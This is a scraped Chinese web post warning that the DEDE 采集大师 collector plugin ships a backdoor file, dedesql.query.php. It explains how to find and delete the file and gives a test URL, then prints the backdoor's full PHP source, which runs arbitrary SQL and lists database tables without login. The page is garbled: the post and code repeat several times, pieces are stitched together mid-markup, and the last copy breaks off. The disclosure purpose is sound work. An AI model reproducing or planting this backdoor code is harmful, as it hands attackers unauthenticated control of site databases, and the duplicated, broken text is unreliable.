</form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; 